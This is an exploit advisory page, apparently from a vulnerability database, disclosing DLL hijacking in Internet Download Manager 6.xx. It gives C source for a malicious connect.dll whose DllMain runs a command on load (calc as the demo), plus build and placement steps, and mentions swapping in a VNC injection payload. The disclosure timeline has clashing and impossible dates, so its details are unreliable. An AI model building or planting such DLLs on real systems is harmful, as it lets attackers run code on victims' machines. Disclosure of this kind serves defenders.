Internet Download Manager 6.xx DLL Hijacking

2015.04.13

Credit: TUNISIAN CYBER

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Internet Download Manager 6.XX DLL Hijacking
#[+] Date: 30-03-2015
#[+] Type: Local Exploits
#[+] Vendor: http://www.internetdownloadmanager.com/
#[+] Tested on: WinXp
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] POC IMG:http://i.imgur.com/qfkEFR8.png (VNCInject)
#[+] gcc -shared -o connect.dll dllhijack.c
#[+] create .ef2 file and put it with connect.dll in the same dir.calc.exe will popup
#[+]Proof of Concept (PoC):
#[+]Timle Line:
07/04/2015:Vulnerability was discovered.
09/04/2015: Contact with vendor.
10/04/2015: No reply.
11/04/2015: Vendor Refused to patch the vulnerability.
2014-15-03: Vulnerability Published
=======================
*/
#include <windows.h>
int tunisian()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
tunisian();
return 0;
}

References:

http://cxsecurity.com/issue/WLB-2015030199

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Internet Download Manager 6.xx DLL Hijacking

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.